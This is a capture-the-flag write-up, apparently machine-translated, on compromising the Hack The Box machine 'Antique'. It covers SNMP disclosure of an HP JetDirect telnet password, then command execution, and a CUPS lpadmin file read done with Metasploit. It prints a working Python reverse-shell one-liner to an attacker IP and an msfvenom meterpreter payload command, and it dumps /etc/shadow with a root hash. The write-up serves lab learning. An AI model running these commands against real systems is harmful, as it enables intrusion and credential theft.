[HTB] Antique (SNMP information disclosure, read from any file of lpadmin user group)

Disclaimers

The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor be responsible for any misuse or damage.

Service detection

┌──(root💀kali)-[~/htb/Antique]
└─# nmap -sV -Pn 10.10.11.107
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:44 EST
Nmap scan report for 10.10.11.107
Host is up (0.39s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.91%I=7%D=11/30%Time=61A61CDF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa
SF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetRe
SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x
SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN
SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus
SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword
SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb
SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo
SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%
SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19
SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\
SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS
SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2
SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,
SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec
SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"
SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet
SF:Direct\n\nPassword:\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 229.74 seconds

A telnet service is opened on port 23. Connect nc to have a look

┌──(root💀kali)-[~/htb/Antique]
└─# nc 10.10.11.107 23             

HP JetDirect

ls
Password: 123456
Invalid password

The greeting is HP JetDirect. I checked that it's HP's printer

You need a password to log in to telnet, but you don't need an account

Find it on Google according to HP JetDirect telnet as a keyword This article

Using the method of Getting a JetDirect password remotely using the SNMP vulnerability, we enter the following information

──(root💀kali)-[~/htb/Antique]
└─# snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Created directory: /var/lib/snmp/cert_indexes
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135 

Get the numbers above This hex2text website , the password is: P@ssw0rd @123!! one hundred and twenty-three

Log in to the telnet account with the above voucher

┌──(root💀kali)-[~/htb/Antique]
└─# nc 10.10.11.107 23

HP JetDirect


Password: P@ssw0rd@123!!123

Please type "?" for HELP
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

exec: execute system commands (exec id)
exit: quit from telnet session
> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
> exec whoami
lp
/var/spool/lpd
> exec find / -name user.txt
/home/lp/user.txt
/var/spool/lpd/user.txt

Right raising

View system related information

> exec uname -a
Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
> exec python3 --version
Python 3.8.10

If you find that Python 3 is installed, use the following command to rebound a handy shell

exec python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

┌──(root💀kali)-[~/htb/Antique]
└─# nc -lnvp 4242                                                                                                                                                                                                                            1 ⨯
listening on [any] 4242 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.107] 41100
$ id
id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
$ 

We found that the user group lpadmin is suspicious and may be used to raise rights. After Google, I found it This article

It says:

members of lpadmin can read every file on server via cups

People in this user group can read any file in the system, so they continue to search the authorization script, and finally find a msf module multi/escalate/cups_root_file_read can be used to raise rights

Let's compile an msf rebound shell first

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f elf > shell.elf

Send it to the target, trigger it, get the msf and execute the right lifting script

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.15:4444 
[*] Sending stage (980808 bytes) to 10.10.11.107
[*] Meterpreter session 2 opened (10.10.14.15:4444 -> 10.10.11.107:52856) at 2021-11-30 11:46:50 -0500

meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /etc/shadow (998 bytes) saved to /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
[*] Cleaning up...
meterpreter > getuid

View the / etc/shadow file

┌──(root💀kali)-[~/htb/Antique]
└─# cat /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
usbmux:*:18891:0:99999:7:::  

Edit to a format that john can read

┌──(root💀kali)-[~/htb/Antique]
└─# cat shadow.txt 
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
                                                                                                                                                                                                                      
┌──(root💀kali)-[~/htb/Antique]
└─# unshadow passwd.txt shadow.txt > unshadowed.txt
                                                                                                                                                                                                                      
┌──(root💀kali)-[~/htb/Antique]
└─# cat unshadowed.txt 
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:0:0:root:/root:/bin/bash

But I can't blow up the code

So change your mind. Will there be an ID under root_ RSA file
Edit msf module

msf6 > use multi/escalate/cups_root_file_read
msf6 post(multi/escalate/cups_root_file_read) > edit

Change line 46 to / root/.ssh/id_rsa

Edit save

Download to local

meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /root/.ssh/id_rsa (341 bytes) saved to /root/.msf4/loot/20211130120322_default_10.10.11.107_cups_file_read_145418.bin
[*] Cleaning up...

However, there is no such document:

┌──(root💀kali)-[~]
└─# cat /root/.msf4/loot/20211130120601_default_10.10.11.107_cups_file_read_604992.bin
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
        <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
        <TITLE>Not Found - CUPS v1.6.1</TITLE>
        <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
</HEAD>
<BODY>
<H1>Not Found</H1>
<P></P>
</BODY>
</HTML>   

Finally, I had to download / root/root.txt locally. It was more than one o'clock in the morning, which was the end of the penetration

meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /root/root.txt (32 bytes) saved to /root/.msf4/loot/20211130120724_default_10.10.11.107_cups_file_read_556098.txt
[*] Cleaning up...

Tags: penetration test

Posted on Wed, 01 Dec 2021 15:51:02 -0500 by ldougherty